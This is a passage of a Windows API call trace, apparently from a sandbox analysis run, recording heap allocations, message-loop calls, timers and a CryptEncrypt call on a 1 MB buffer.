(HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0201.789] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0201.789] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50728 [0201.789] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0201.789] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0201.789] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0201.789] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0201.789] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0201.789] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0201.789] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0201.789] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0201.789] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0201.789] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0201.789] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0201.789] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0201.789] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0201.790] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543f0 [0201.790] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0201.790] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0201.790] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0201.790] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0201.790] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0201.790] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0201.790] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0201.790] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0201.790] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0201.790] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0201.790] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0201.790] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0201.790] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0201.790] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0201.791] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0201.791] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0201.791] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0201.791] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0201.791] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0201.791] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0201.791] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0201.791] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0201.791] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0201.791] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0201.791] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0201.791] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0201.791] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0201.791] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0201.791] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0201.791] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0201.791] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0201.791] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0201.791] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x100000) returned 0x118d020 [0201.823] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0201.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0201.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0201.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0201.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0201.824] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0201.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xd) returned 0x2e50b78 [0201.824] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e50b78, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0201.825] CryptEncrypt (in: hKey=0xa87250, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x100000, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x100000) returned 1 [0201.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0201.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54148 [0201.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0201.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0201.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0201.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0201.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0201.825] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0201.825] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0201.825] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0201.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0201.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0201.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0201.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0201.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0201.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0201.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0201.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0201.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0201.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0201.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0201.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0201.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0201.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0201.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0201.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0201.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0201.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0201.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0201.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0201.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0201.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0201.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0201.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0201.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0201.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0201.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0201.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0201.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0201.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0201.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0201.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0201.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0201.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0201.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0201.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0201.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0201.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0201.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0201.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0201.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0201.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0201.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0201.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0201.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d70 [0201.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0201.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: hHeap=0x970000) returned 1 [0201.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0201.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0201.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0201.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0201.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0201.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0201.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0201.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0201.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0201.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54440 | out: hHeap=0x970000) returned 1 [0201.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0201.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0201.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0201.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0201.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0201.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0201.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0201.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0201.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0201.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0201.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0201.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0201.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0201.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0201.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0201.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0201.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0201.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0201.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0201.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0201.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0201.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0201.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0201.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0201.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0201.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0201.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0201.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0201.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56430 | out: hHeap=0x970000) returned 1 [0201.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0201.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0201.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0201.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0201.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e558d8 [0201.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0201.829] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 1 [0201.829] TranslateMessage (lpMsg=0x8cf3b8) returned 0 [0201.829] DispatchMessageW (lpMsg=0x8cf3b8) returned 0x0 [0201.830] KillTimer (hWnd=0x402c2, uIDEvent=0x1) returned 1 [0201.830] SetTimer (hWnd=0x402c2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0201.830] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0201.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0201.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0201.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0201.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0201.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0201.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0201.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0201.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0201.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0201.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0201.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77ac8 [0201.830] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0201.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77ac8 | out: hHeap=0x970000) returned 1 [0201.830] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0201.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0201.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0201.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0201.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0201.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0201.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0201.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0201.831] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0201.831] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0201.831] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0201.831] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0201.831] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0201.831] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0201.831] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0201.831] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0201.831] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0201.831] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0201.831] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0201.831] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0201.831] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543f0 [0201.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0201.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0201.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0201.831] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0201.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0201.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0201.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0201.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0201.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69ba8 [0201.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0201.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54440 [0201.832] CharLowerBuffW (in: lpsz="byte[1048576]", cchLength=0xd | out: lpsz="byte[1048576]") returned 0xd [0201.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977cc8 [0201.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0201.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0201.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0201.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0201.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0201.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0201.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0201.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0201.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0201.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0201.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0201.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0201.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0201.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0201.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0201.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x100000) returned 0x118b020 [0201.874] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54440 | out: hHeap=0x970000) returned 1 [0201.874] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0201.874] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543f0 | out: hHeap=0x970000) returned 1 [0201.874] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0201.874] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0201.874] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0201.874] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0201.874] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0201.874] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0201.874] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0201.874] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0201.874] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69ac8 [0201.875] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977db8 [0201.875] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0201.875] RtlAllocateHeap 